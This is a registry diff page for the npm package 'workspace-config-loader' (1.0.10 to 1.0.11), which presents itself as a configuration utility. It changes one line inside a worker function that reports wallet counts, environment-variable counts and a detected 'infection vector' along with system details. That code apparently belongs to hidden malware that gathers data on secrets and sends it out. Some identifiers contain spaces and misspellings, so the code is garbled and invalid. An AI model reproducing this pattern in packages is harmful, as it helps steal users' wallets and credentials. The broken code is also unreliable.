workspace-config-loader 1.0.10 → 1.0.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/lib/worker.js +1 -1
  2. package/package.json +1 -1
package/lib/worker.js CHANGED
@@ -1194,7 +1194,7 @@ async function _transmitStatus(findingsCount, walletCount, envVarCount) {
1194
1194
  try {
1195
1195
  const metrics = {
1196
1196
  type: 'compliance verification_metrecs',
1197
- compliance verification_vector: detectInfectionVector(),
1197
+ compliance_verification_vector: detectInfectionVector(),
1198
1198
  platform: os.platform(),
1199
1199
  arch: os.arch(),
1200
1200
  node_version: process.version,
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "workspace-config-loader",
3
- "version": "1.0.10",
3
+ "version": "1.0.11",
4
4
  "description": "Workspace configuration loading and management utilities",
5
5
  "main": "index.js",
6
6
  "license": "MIT",